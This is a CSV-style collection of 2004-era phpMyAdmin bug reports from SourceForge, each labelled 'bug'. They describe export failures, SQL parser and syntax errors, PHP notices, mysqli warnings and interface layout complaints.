When I export the database with constraint supported, I meet some problem SQL Statment 1 CREATE TABLE `categoryinfo` `CategoryNo` int 10) unsigned NOT NULL default 0 , `CategoryType` int 3) unsigned NOT NULL default 1 , `CategoryName` varchar 100) NOT NULL default , `CategoryDesc` varchar 255) default NULL, `DataCreateOwner` int 10) unsigned NOT NULL default 1 , `DataCreateTime` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP, `DataUpdateOwner` int 10) unsigned default NULL, `DataUpdateTime` timestamp NOT NULL default 0000 00 00 00 00 00 , PRIMARY KEY `CategoryNo`,`CategoryType`), UNIQUE KEY `CategoryType` `CategoryType`,`CategoryName`), KEY `DataCreateOwner` `DataCreateOwner`), KEY `DataUpdateOwner` `DataUpdateOwner`), KEY `CategoryNo` `CategoryNo`) CONSTRAINT `categoryinfo ibfk 2` FOREIGN KEY `DataUpdateOwner`) REFERENCES `userinfo` `UserNo`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; this statment miss one , after KEY `CategoryNo` `CategoryNo`) SQL Statment 2 ALTER TABLE `categoryinfo` ADD CONSTRAINT `categoryinfo ibfk 1` FOREIGN KEY `DataCreateOwner`) REFERENCES `userinfo` `UserNo`),; and this statment have one surplus , before ; thank you!
Original URL https sourceforge.net p phpmyadmin bugs 1318 https sourceforge.net p phpmyadmin bugs 1318 Original author anonymous","bug"
"24444","7686","Created timestamp fields are forcing defaults.
When i create timestamps in ANY table the interface forces both to null=yes, which is fine.
But the interface is forcing the first timestamp s default=null and the second timestamp default=00000000000000.
I need to either make both default=null or default=0x14.
Original URL https sourceforge.net p phpmyadmin bugs 1319 https sourceforge.net p phpmyadmin bugs 1319 Original author lintonbe Found in version 2.5.6","bug"
"24444","7687","Export with send and zip compresses truncates large dump.
Hello we were running a phpMyAdmin 2.5.6 on MySQL 4.0.16 standard log on a linux Server.
I recently retrieved a dump of a 27 MB Sized Database and chose the options send and zip compressed.
The archive i downloaded extracted fine but the sql file within oddly named lt;name gt;.sql.zip.sql) was only half as long as the complete Dump.
the last SQL Command within was truncyted somewhere in the middle.
The Table that was being processed then contains complete HTML pages sized 20K to 80K.
I cant recall getting incomplete dump on other occasions.
hope this helps cheers Jens Original URL https sourceforge.net p phpmyadmin bugs 1320 https sourceforge.net p phpmyadmin bugs 1320 Original author kiste77 Found in version 2.5.6","bug"
"24444","7688","www.phpmyadmin.net is down.
I can t seem to access the phpmyadmin.net homepage.
I tried , homepage, cvs, and all come back forbidden .
Forbidden You don t have permission to access on this server.
Apache 1.3.26 Server at www.phpmyadmin.net Port 80 Original URL https sourceforge.net p phpmyadmin bugs 1324 https sourceforge.net p phpmyadmin bugs 1324 Original author ryandesign","bug"
"24444","7689","Failed to set the characterset of a MySQL5 table.
It s not possible to set a character set of a MySQL 5 table to a none standard character set of a character set family.
Original URL https sourceforge.net p phpmyadmin bugs 1321 https sourceforge.net p phpmyadmin bugs 1321 Original author futurecrash","bug"
"24444","7690","SQL errors when ordering by count ).
for ex.
i m doing a query like SELECT count ) , msg FROM msghist GROUP BY msg LIMIT 0 , 30 and everything works, i get the results, click on count ) to sort everything by count ) phpMyAdmin now generates such query see below), which is apparently wrong and fails w mysql error.
version in use 4.0.x this is the q generated SELECT SQL CALC FOUND ROWS count ) , msg FROM msghist GROUP BY msg ORDER BY `count )` ASC LIMIT 1 i m not smart enough to understand wtf that SQL CALC FOUND ROWS is required, but imo and it works with mysql 4.0.x) the correct q woud be SELECT count ) as countdata, msg FROM msghist GROUP BY msg ORDER BY `countdata` ASC Kirils Solovjovs kirils at r1g dot edu dot lv Original URL https sourceforge.net p phpmyadmin bugs 1322 https sourceforge.net p phpmyadmin bugs 1322 Original author anonymous Found in version Latest Git","bug"
"24444","7691","left upper frame is too large.
if you set in your config cfg[ LeftDisplayLogo ]=FALSE; then the left frame stays too large.
this is the solution in index.php, line 81 if num dbs gt; 1) \{ if cfg[ LeftFrameLight ] and cfg[ LeftDisplayLogo ] ==TRUE) \{ query frame height = query frame height 40; \} \} i think the left upper frame is still using too much space, cause you only need it sometimes.
i think the top icons should use only exact the space, they need about16px) and the lt;hr gt; lines are not needed, and the word Database is not needed either.
this could all be the option for cfg[ LeftDisplayLogo ] =FALSE anyway, i like the new design.
only the orange is a bit too strong ;) Original URL https sourceforge.net p phpmyadmin bugs 1323 https sourceforge.net p phpmyadmin bugs 1323 Original author rubo77 Found in version 2.6.0 beta2","bug"
"24444","7692","left frame too huge when no logo.
Hello, when changeing cfg[ LeftDisplayLogo ] to false the left frame for the Database Dropdown is to huge.
For me the attached index.php works better ;) Greets Original URL https sourceforge.net p phpmyadmin bugs 1325 https sourceforge.net p phpmyadmin bugs 1325 Original author killergod2000 Found in version Latest Git","bug"
"24444","7693","Consistency order of truncate drop).
In the tables list view, the first icon is drop, the second is truncate.
But in the table view, the first one is truncate, the second one is drop.
This is kinda confusing.
Please fix the order in the tables list view so that both are first truncate, then drop.
You could also remove both from the tables list view, as they re not frequently used and kinda dangerous.
And you can still access them by first selecting the table with the checkbox and then choosing the action.
Original URL https sourceforge.net p phpmyadmin bugs 1327 https sourceforge.net p phpmyadmin bugs 1327 Original author olafvdspek","bug"
"24444","7694","SQL export hidden after failure.
Export gt; Save on server gt; failure gt; you don t see SQL export.
Original URL https sourceforge.net p phpmyadmin bugs 1326 https sourceforge.net p phpmyadmin bugs 1326 Original author nijel Found in version Latest Git","bug"
"24444","7695","export without WHERE causes sql error.
viewing a table with browse, then attempting to export that data causes a sql error.
browse export the query to export will have a where at the end with no where clause SELECT FROM `my table` WHERE and causes sql error.
Original URL https sourceforge.net p phpmyadmin bugs 1328 https sourceforge.net p phpmyadmin bugs 1328 Original author anonymous Found in version Latest Git","bug"
"24444","7696","Exporting of string 0 .
When I want to export rows from table when column type is `enum` and values like 0 , 1 , ...), 0 [zero] is exported as [empty string] php 4.3.8 dev PMA 2.6.0 beta3 12.7.2004) Original URL https sourceforge.net p phpmyadmin bugs 1329 https sourceforge.net p phpmyadmin bugs 1329 Original author jenix","bug"
"24444","7697","CSV Export causes MySql error.
I am trying to export query data SELECT d.catalognumber AS Details catalognumber, w.catalognumber AS WarP catalognumber FROM prts details catalognumbers d LEFT JOIN prts warp catalognumbers w ON d.catalognumber = w.catalognumber WHERE isnull w.catalognumber) Tables d and w just have one column catalognumber VARCHAR 50) ).
The 2 result columns are displayed fine.
After hitting Export at the bottom of the right frame and selecting Export CSV Data Send , PMA shows the SQL SELECT d.catalognumber AS Details catalognumber, w.catalognumber AS WarP catalognumber FROM prts details catalognumbers d LEFT JOIN prts warp catalognumbers w ON d.catalognumber = w.catalognumber WHERE isnull w.catalognumber ) LIMIT 2922 The MySQL error is 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near w .
catalognumber ) LIMIT 2922 at line 1 Perhaps this is caused by the added LIMIT clause?
I am using PMA 2.6.0 beta2.
This happend with 2.5.5 pl?
?, too.
Best regards, Joachim Wiesbaden, Germany Original URL https sourceforge.net p phpmyadmin bugs 1330 https sourceforge.net p phpmyadmin bugs 1330 Original author jwerner","bug"
"24444","7698","Undefined index Default tbl change.php 298.
Notice Undefined index Default in phpMyAdmin 20040711 210015 tbl change.php on line 298 The CVS snapshot hasn t been updated since 20040711 by the way.
Original URL https sourceforge.net p phpmyadmin bugs 1331 https sourceforge.net p phpmyadmin bugs 1331 Original author ryandesign Found in version Latest Git","bug"
"24444","7699","New column after... menu.
In the menu where you add a column before or after another column, it used to say in 2.5.7 pl1) At End Of Table , At Beginning Of Table , After lt;Field 1 gt; , After lt;Field 2 gt; , and so on.
Now it says At End Of Table , At Beginning Of Table , After , lt;Field 1 gt; , lt;Field 2 gt; .
Screenshot) This feels like a bug, because I m not sure what purpose it would serve for me to select the item After from the menu, and the way that the field names are listed by themselves, without the word After before them, is less clear.
CVS snapshot 20040711 Original URL https sourceforge.net p phpmyadmin bugs 1332 https sourceforge.net p phpmyadmin bugs 1332 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7700","Confusing wording when adding fields.
When adding more fields to a table that already has fields, the line below the fields to add looks like this There s a button Save .
then it says, in italics, Or , and then in normal text Fields .
Then there s a small input text item, which has a 2 in it I was adding 2 fields).
Then there s a button Go .
This wording is not at all clear, and I honestly don t know what is supposed to happen when I click the Go button.
An improvement in the wording is requested to make it clear what functionality is being offered.
CVS Snapshot 20040711 Original URL https sourceforge.net p phpmyadmin bugs 1333 https sourceforge.net p phpmyadmin bugs 1333 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7701","First login shows PHP Error.
First time I logged into PHPMyAdmin 2.6.0 Beta2, I did not get any display at all...
I looked at the source code in the browser, of the frames page, and found this PHP error in the outputed html lt;br gt; lt;b gt;Notice lt; b gt; Undefined index LeftWidth in lt;b gt;C \Program Files\Apache Group\Apache2\htdocs\myadmin\index.php lt; b gt; on line lt;b gt;116 lt; b gt; lt;br gt; lt;frameset cols= 200, rows= border= 1 frameborder= 1 framespacing= 0 gt; Now, it fixed itself up after hitting F5 to refresh.
It hadn t come back since that, so it looked like some sort of initialization error.
I used Mozilla FireFox 0.9.2 every time.
The next day, I tried logging in with Internet Exploiter 6.0, and got the same error, blank screen, looked at the source, and once again, same error.
I hit F5 again, and now in IE 6.0, that error was gone from then on.
So it only really happens once and then comes right?
I use Windows XP, MySQL 4.0.18, and PHP 5.0 RC2.
But I am about to upgrade to PHP 5.0 final release So it looks like some sort of initialization error???
that only happens once.
Original URL https sourceforge.net p phpmyadmin bugs 1334 https sourceforge.net p phpmyadmin bugs 1334 Original author robvdl Found in version 2.6.0 beta2","bug"
"24444","7702","Undefined variable available themes choices.
When setting cfg[ ThemeManager ] to FALSE, I got the following error on the welcome page Notice Undefined variable available themes choices in [...]\pma\main.php on line 579.
Server pma 2.6.0 b2, Windows 2003, PHP 5.0.0, mysql 4.0.20.
Original URL https sourceforge.net p phpmyadmin bugs 1335 https sourceforge.net p phpmyadmin bugs 1335 Original author michaelpiche Found in version 2.6.0 beta2","bug"
"24444","7703","Database 5 .
Here s an unusual problem.
I sometimes get it where I start working with a database, but it ends up thinking my database is named 5 and then I get errors when trying to continue working with it, because there is no database named 5 .
This is with CVS Snapshop 20040711.
I tested Safari 1.2.2, where it occurs, and Firefox 0.9.1 20040714, where it does not occur.
Here s the sequence of steps New window Go to PMA Either log in cookie auth), or am already logged in Select database test gt; The line across the top reads Server fusion gt; Database test and the window titlebar says something similar.
The select menu in the left frame has the database test selected.
Now create new table blah with 1 field gt; The line across the top now reads Server fusion gt; Database 5 gt; Table blah , the window titlebar concurs, and the left frame reloads so that the item Databases) ... is selected again.
I see the usual form where I can define the fields in my new table, but if I fill in the form and click Save, I get a MySQL error 1046 No Database Selected Selecting the database from the select menu in the left frame and repeating the series of steps then produces the correct result.
It s only when performing these steps in a new window.
I tried both language=en iso 8859 1 and language=en utf 8 with anywhere recoding, doesn t seem to matter I tried both themes, doesn t seem to matter either In Firefox, the same steps have the correct result, even in a new window This is MySQL 4.0.20 standard with PHP 4.3.6 www.entropy.ch release 4) on Mac OS X 10.3.4.
I had this problem quite frequently in the early alpha or beta releases of 2.6.0 but then didn t see it for awhile so I thought it was fixed so I didn t report it earlier.
I guess maybe I just wasn t creating any new tables there for awhile.
Original URL https sourceforge.net p phpmyadmin bugs 1336 https sourceforge.net p phpmyadmin bugs 1336 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7704","PHP 5.0.0 breaks HTTP auth.
under Apache 1.3.x php bug!).
Not sure how or why this happens, but my HTTP auth setup, which worked with PHP 4.3.8, suddenly doesn t work with PHP 5.0.0.
I keep getting prompted for the username and password over and over; it s not liking what I type in.
Nothing else changed in my setup.
Original URL https sourceforge.net p phpmyadmin bugs 1337 https sourceforge.net p phpmyadmin bugs 1337 Original author tuxedobob Found in version 2.5.7","bug"
"24444","7705","Left top frame not tall enough IE 5.0 Win.
Don t know if you care about a browser as old as IE 5.0 for Windows, but if you do, then you may want to know that the left top frame is not tall enough.
The word Databases is cut off and the select menu below it is not visible at all.
Screenshot attached.
This may be because I have the server list shown in the left top frame, as a list of links, not as a select menu.
Or it may be because IE 5 for Windows shows text larger than other browsers I ve seen, including IE 6 for Windows.
In Safari for Mac, Firefox, and IE 6, it all seems to fit properly.
Original URL https sourceforge.net p phpmyadmin bugs 1339 https sourceforge.net p phpmyadmin bugs 1339 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7706","Error Running a select statement with LIKE.
Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNodjt1OgzAAhe 7FOdiuzHQtR0ss3eE1I1YfmxxJN6YLSORBLGCEn0vHtDOu5N8J985ypjSSKQc qYBWhUTEEHFEO2JrDxZC0pOVWGVXiemzd dxakfadxfq3lwwQ1ABwdh2w lG7CCEjIUUW4zny cE 9eOwIvmvfdLeTBkVjDxbg9IGSA6qqAOclJ9pugF5 ZJpnSCmjFR5Ir06pnHoek6qY3XrBaV 4jFl aLKiqIlOioNEO4Td9BHu9 F9yMn lFVapTXu8GDKHN0wv3Zf7fuE5qiMwi1DZ48Ky3q rpc DyhE 1Q== END CUT BEGIN RAW ERROR C1 C2 LEN 40 41 46 STR xc2xb4 CVS Id sqlparser.lib.php,v 2.2 2003 11 26 22 52 23 rabus Exp MySQL 4.0.20 USR OS, AGENT, VER Win MOZILLA 5.0 PMA 2.5.5 pl1 PHP VER,OS 5.0.0 WINNT LANG en iso 8859 1 SQL SELECT FROM inv items WHERE item LIKE xc2xb4 vd xc2xb4 END RAW SQL query SELECT FROM inv items WHERE item LIKE xc2xb4 vd xc2xb4 MySQL said 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near xc2xb4 vd xc2xb4 at line 1 runs fine from the command line Original URL https sourceforge.net p phpmyadmin bugs 1338 https sourceforge.net p phpmyadmin bugs 1338 Original author steve78 Found in version 2.5.7 pl1","bug"
"24444","7707","Clicking last record goes to second to last page.
There were 5 pages in one of my tables, I clicked the last record button, it went to page 4 not page 5, it kept doing this.
The only way I could get to page 5, is by using the next button, or by selecting page 5 from the dropdown box.
but not by using the last record button like I expected.
Later on, more data was added to the same table, and it became 6 pages, but like before, it was showing the same behaviour, this time, clicking last record would go to page 5, not page 6 like expected...
Original URL https sourceforge.net p phpmyadmin bugs 1340 https sourceforge.net p phpmyadmin bugs 1340 Original author robvdl Found in version 2.6.0 beta2","bug"
"24444","7708","Wrong field flags with MySQLi.
I noticed that when you export a column with the datetime field type, it converts the datetime value to hex.
As far as I can see it has to do with mysqli.dbi.lib.php PMA DBI field flags function treating a datetime field as binary so that when it hits sql.php, on line 573, it sees that the datetime is binary and executes the bin2hex function which then converts it to a hex value.
Original URL https sourceforge.net p phpmyadmin bugs 1341 https sourceforge.net p phpmyadmin bugs 1341 Original author luegner Found in version 2.6.0 beta2","bug"
"24444","7709","2.5.7 pl1) The document contains no data 3797 tables).. Hi When i thy to admin a database with 3797 tables my WebBrowser Galeon) says The document contains no data !
This is what I do 1\.
Opens phpMyAdmin and I can view small databases all is fine) 2\.
When I select the large database the computer works for about 30 seconds and the returns The document contains no data .
from phpinfo ) SERVER[ SERVER SOFTWARE ] Apache 1.3.22 Unix) Red Hat Linux) mod ssl 2.8.5 OpenSSL 0.9.6b DAV 1.0.2 PHP 4.1.2 mod perl 1.24 01 SERVER[ SCRIPT FILENAME ] home httpd 2 html cj phpMyAdmin 2.5.7 pl1 phpinfo.php Perhaps this is not in phpMyAdmin but a case of slow computers.
Some kind of better handling of this error could be nice.
Note1 Saved the phpinfo.php and attached it for mote clues).
Note2 Version phpMyAdmin 2.2.6 returns the same but then displays the left frame, so one can select a table and work from there.
Note3 Some kind of view the first 1000 tables could fix the problem, and a view next 1000 tables ...... Then larger databases would behave as small ones?
Regards Johan Simonsson Original URL https sourceforge.net p phpmyadmin bugs 1342 https sourceforge.net p phpmyadmin bugs 1342 Original author jsiei97 Found in version 2.5.7 pl1","bug"
"24444","7710","Cannot copy data to another table mysqli).
I renamed my previous phpmyadmin database to phpmyadmin 1 as phpmyadmin 2.5.7 seemed to have trouble with it and created a new database using the script you supplied.
All went well until I tried to copy the old data from phpmyadmin 1.pma column info to the new phpmyadmin.pma column info database.
Here is the report Notice Undefined variable result in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php on line 216 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php on line 408 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\tbl move copy.php 216) in C \Program Files\Apache Group\Apache2\htdocs\phpMyAdmin 2.6.0 beta2\libraries\header http.inc.php on line 20 Also when I click the insert button mysql reports commands out of sync .
I am using phpmyadmin 2.6.0 beta2 php 5.0.0 phpmyadmin reports 4.0.18 nt) with extension mysqli.dll Apache 2.0.49 Win XP huphos msn.com huphos lycos.co.uk Original URL https sourceforge.net p phpmyadmin bugs 1343 https sourceforge.net p phpmyadmin bugs 1343 Original author anonymous Found in version 2.6.0 beta2","bug"
"24444","7711","Collation conflicts PMADB, search).
gb2312?
but no gbk?
gbk should be more common than gb2312 but gbk is not in phpmyadmin Original URL https sourceforge.net p phpmyadmin bugs 1344 https sourceforge.net p phpmyadmin bugs 1344 Original author xuefer Found in version 2.6.0 beta2","bug"
"24444","7712","total rows with innodb.
Hello i have a table with innodb type and 80000 entrys if i browse the table i get allways different total numbers for the max rows.
79863,78052 and so on.
a select count ) returns the correct total numbers on rows.
if i change ionnodb to myisam it works correct.
BR Torsten Rosenberger Original URL https sourceforge.net p phpmyadmin bugs 1345 https sourceforge.net p phpmyadmin bugs 1345 Original author anonymous Found in version 2.5.7 pl1","bug"
"24444","7713","Adding PK w o Existing PK.
PHP 5.0.0 MySQL 4.1.3 Beta I am trying to add a Primary Key to a table I just created.
I clicked on the PK button.
It issues the following SQL query ALTER TABLE `ar1` DROP PRIMARY KEY , ADD PRIMARY KEY `CustomerNumber` ) However, since there is no existing PK, I get the following error 1091 Can t DROP PRIMARY ; check that column key exists Any help would be great.
will willfxp at yahoo Original URL https sourceforge.net p phpmyadmin bugs 1346 https sourceforge.net p phpmyadmin bugs 1346 Original author anonymous Found in version 2.6.0 beta2","bug"
"24444","7714","Illegal mix of collations.
If our connection collation is not latin1, we have some problems.
main.php might not detect our Create privs, and errors are displayed in server privileges.php.
As suggested by Alexander, I am adding charset introducers and collation information to the strings and variables used in comparisons in those scripts.
Original URL https sourceforge.net p phpmyadmin bugs 1347 https sourceforge.net p phpmyadmin bugs 1347 Original author lem9 Found in version Latest Git","bug"
"24444","7715","No database dropdown list update on db deletion.
When dropping a database, the databse dropdown box in the lefthand frame does not update to remove the dropped database name.
the database is removed successfully it is not listed when I click on Databases on the homepage).
By doing this, the left frame is not reloaded and it still shows the deleted database in the dropdown box.
Refreshing the whole page updates all frames and the list is corrected.
Using Windows XP with latest updates PHP 5.0.0 mySQL 4.0.20d IE 6.0 with latest updates PMA 2.6.0b3 latest CVS 20040727 043952) Apache 2.0.50 Original URL https sourceforge.net p phpmyadmin bugs 1348 https sourceforge.net p phpmyadmin bugs 1348 Original author anonymous","bug"
"24444","7716","sql.php crashes with segfault.
My apache thread crashes with a segmentation fault in the logfiles.
Everything works fine, but if I want to use sql.php it just does nothing?
I run PHP 4.3.8; with MySQL 4.0.20 log on Slackware 9.1 the Apache error log says [notice] child pid exit signal Segmentation fault 11) The problem seems to be in the lines 523 544 If i die befor that it dies, if I die after it, it segfaults..
I ll let you know if I find anything else Original URL https sourceforge.net p phpmyadmin bugs 1349 https sourceforge.net p phpmyadmin bugs 1349 Original author spider 007 Found in version 2.5.7 pl1","bug"
"24444","7717","Some functions do not take parameters.
The default value is set to be 0000 00 00 00 00 00 for DATETIME fields.
When I create a record, whenever I set CURDATE , the default value still takes place.
The SQL will become CURDATE 0000 00 00 00 00 00 ) and generates error.
What I mean is, the default value and the value I choose from the drop down list exist together.
This problem exists with functions that don t take parameter as well.
Original URL https sourceforge.net p phpmyadmin bugs 1350 https sourceforge.net p phpmyadmin bugs 1350 Original author jeffery205 Found in version Latest Git","bug"
"24444","7718","Not always showing full database list.
We re using a Red Hat ES3 system, with Apache 2.0.46 and PHP 4.3.6, and phpMyAdmin 2.6.0beta2; our browser software is Opera 7.23 on WinXP.
The database list in the left frame doesn t always contain the full set of available databases; instead a seemingly random selection is missing.
This selection changes between page views.
The full list is always shown correctly when refreshing the entire page, going back to the homepage.
Original URL https sourceforge.net p phpmyadmin bugs 1351 https sourceforge.net p phpmyadmin bugs 1351 Original author anonymous Found in version 2.6.0 beta2","bug"
"24444","7719","backslashes shown in dutch translation.
click on a table on the left gt; Handelingen or Operations , and the you see Wijzig het \ Sorteren op Order by\ van de tabel where the english one is Alter table order by .
I do not know if this also occurs in other languages.
Original URL https sourceforge.net p phpmyadmin bugs 1352 https sourceforge.net p phpmyadmin bugs 1352 Original author tkteun Found in version Latest Git","bug"
"24444","7720","MySQL out of sync on insert page.
We ve got another MySQL out of sync problem.
I get this error on the insert page now.
Original URL https sourceforge.net p phpmyadmin bugs 1353 https sourceforge.net p phpmyadmin bugs 1353 Original author rabus Found in version Latest Git","bug"
"24444","7721","invalid MySQL result resource.
Click on Edit pencil icon) of content browser leads to following warning warning is shown for every column of the table) Warning mysql field len ) 41 is not a valid MySQL result resource in libraries dbi mysql.dbi.lib.php on line 252 System Windows NT PP 4.0 build 1381 Apache 2.0.50 Win32) PHP 4.3.8 Apache 2.0 Handler MySQL 4.0.17 max nt Peter Original URL https sourceforge.net p phpmyadmin bugs 1354 https sourceforge.net p phpmyadmin bugs 1354 Original author mandabaer Found in version Latest Git snapshot","bug"
"24444","7722","Themes screenshots outdated.
Themes screenshots should be updated to contain current logo.
Original URL https sourceforge.net p phpmyadmin bugs 1355 https sourceforge.net p phpmyadmin bugs 1355 Original author nijel Found in version Latest Git","bug"
"24444","7723","Can t manipulate usernames containing .
This bug concerns usernames that contain .
I created user with username example nothost host is not included it is just username).
Username has been created by phpMyAdmin correctly but it can t be manipulated right now with phpMyAdmin.
It is because as I think) queries are not properly send to the MySQL server.
As I guess this is because example nothost realhost is exploded with delimeter .
This means that example become username and nothost become host.
The real hostname is lost.
These are for example) queries send to server when the user requests phpMyAdmin to delete the created user Usuwanie example nothost ... DELETE FROM `user` WHERE `User` = example AND `Host` = nothost ; DELETE FROM `db` WHERE `User` = example AND `Host` = nothost ; DELETE FROM `tables priv` WHERE `User` = example AND `Host` = nothost ; DELETE FROM `columns priv` WHERE `User` = example AND `Host` = nothost ; Prze amp; 322;adowanie uprawnie amp; 324; ...
FLUSH PRIVILEGES ; As one can see the phpMyAdmin try to delete user example connecting from nothost .
In my opinion example nothost should stand for username and realhost for hostname.
Sorry for Polish comments but it is rather clear even without understanding them.
Details of machine where the bug was exploited Linux kernel 2.4.22 26mdk Mandrake 9.2) phpMyAdmin 2.5.7 pl1 PHP 5.0.0 Apache httpd 2.0.50 Original URL https sourceforge.net p phpmyadmin bugs 1356 https sourceforge.net p phpmyadmin bugs 1356 Original author kruszek Found in version 2.5.7 pl1","bug"
"24444","7724","Cannot change auto increment of InnoDB.
In the Operations tab, phpMyAdmin offers the ability to set the auto increment value.
This works for MyISAM tables, but not for InnoDB.
phpMyAdmin should either not show this option for InnoDB tables, or should offer a workaround, such as inserting a row with an ID one less than the specified next value, and then deleting it again, but note this http dev.mysql.com doc mysql en InnoDB auto increment column.html It says that the autoincrement value will reset itself when the server is restarted.
So, if the above workaround is chosen, the user maybe should at least be informed that their change may get undone if the server is restarted.
Tested in PMA 2.5.7 pl1 and 2.6.0 CVS snapshot 20040803 041652.
Original URL https sourceforge.net p phpmyadmin bugs 1357 https sourceforge.net p phpmyadmin bugs 1357 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7725","sorting error in relation field.
when setting up a relation between tables, you can choose a field to display instead of the id for this relation now, when editing data, you get the selectbox the values id field to display and field to display id and here comes the error the values of field to display id are sorted by field to display , but shouldn t the values of id field to display be sorted by id ?
they are sorted by field to display , too maybe it is intended like that, but sounds illogical to me regards, Chris chris at) webnrg dot de Original URL https sourceforge.net p phpmyadmin bugs 1358 https sourceforge.net p phpmyadmin bugs 1358 Original author anonymous Found in version 2.5.6","bug"
"24444","7726","date function takes arguments when non needed.
I apoligize for my rusty english to begin with so please be patient S .
when using the insert page and you have a date it defaults to 0000 00 00 wich is fine but if you change it to now ) or curdate ) in the function dropdown and then insert it will error because it give the 0000 00 00 argument in curdate or now.
more a usability issue really.
also maybe its jsut me but fr utf 8 gives me some strange asian symbols when i try to do xc3xa9 or other common french letters it uses the xc3xa9 and another following letter and makes a new asiatic looking one) Thanks great great program u have!
stephBoisvert at hotmail.com Original URL https sourceforge.net p phpmyadmin bugs 1359 https sourceforge.net p phpmyadmin bugs 1359 Original author anonymous Found in version 2.6.0 beta2","bug"
"24444","7727","Couldn t fetch mysqli result PDF problems.
I am testing 2.6.0 beta2 with PHP 5.0.0 and MySQL 4.1.3 beta.
When I select a database I get the following message Warning in ...\phpMyAdmin 2.6.0 beta2 \libraries\dbi\mysqli.dbi.lib.php on line 176 Couldn t fetch mysqli result I trapped this using the debugger in PHPEdit.
The call stack was as follows mysqli.dbi.lib.php 176) mysqli free result ) mysqli.dbi.lib.php 176) PMA DBI free result ) mysql charsets.lib.php 238) PMA getDbCollation ) db details structure.php 108) ..\phpMyAdmin 2.6.0 beta2\db details structure.php main ) Line 238 in mysql charsets.lib.php is a duplicate of line 237, so I commented it out and this cured the problem.
Original URL https sourceforge.net p phpmyadmin bugs 1360 https sourceforge.net p phpmyadmin bugs 1360 Original author tonymarston Found in version 2.6.0 beta2","bug"
"24444","7728","Function cannot be used with MYSQL USE RESULT.
I am testing 2.6.0 beta2 with PHP 5.0.0 and MySQL 4.1.3 beta.
When I select a database table I get the following message Warning in ...\phpMyAdmin 2.6.0 beta2 \libraries\dbi\mysqli.dbi.lib.php on line 229 mysqli num rows ) Function cannot be used with MYSQL USE RESULT I trapped this using the debugger in PHPEdit.
The call stack was as follows mysqli.dbi.lib.php 229) mysqli num rows ) mysqli.dbi.lib.php 229) PMA DBI num rows ) db details structure.php 807) ..\phpMyAdmin 2.6.0 beta2\db details structure.php main ) I was unable to determine the actual cause of this problem.
Original URL https sourceforge.net p phpmyadmin bugs 1361 https sourceforge.net p phpmyadmin bugs 1361 Original author tonymarston Found in version 2.6.0 beta2","bug"
"24444","7729","searchform relation display bug.
Hello, in the source of the searchform I got this lt;br gt; lt;b gt;Notice lt; b gt; Undefined offset 0 in lt;b gt; www phpmyadmin libraries relation.lib.php lt; b gt; on line lt;b gt;629 lt; b gt; lt;br gt; .... PS this happens only with Tables that have relations.
... at least 1 question, why display you all related field 2 times ?
Greets Original URL https sourceforge.net p phpmyadmin bugs 1362 https sourceforge.net p phpmyadmin bugs 1362 Original author killergod2000 Found in version Latest Git snapshot","bug"
"24444","7730","Theme darkblue orange calendar visibility.
I like the theme darkblue orange, but the visibility of the calendar popup is very poor.
Peter Original URL https sourceforge.net p phpmyadmin bugs 1363 https sourceforge.net p phpmyadmin bugs 1363 Original author mandabaer Found in version Latest Git","bug"
"24444","7731","New logo is too large.
In my humble opinion the new logo is too large.
It takes up too much space on the screen and leaves less room for actual data.
Original URL https sourceforge.net p phpmyadmin bugs 1364 https sourceforge.net p phpmyadmin bugs 1364 Original author tonymarston Found in version 2.6.0 beta2","bug"
"24444","7732","Font used in database dropdown list is too small.
In my humble opinion the font used in the dropdown list for available databases) in the left hand frame is too small.
I now have to squint in order to read them.
Original URL https sourceforge.net p phpmyadmin bugs 1365 https sourceforge.net p phpmyadmin bugs 1365 Original author tonymarston Found in version 2.6.0 beta2","bug"
"24444","7733","wrong foreign fields shown in search.
I have a table with several fields, that has foreign keys assigned.
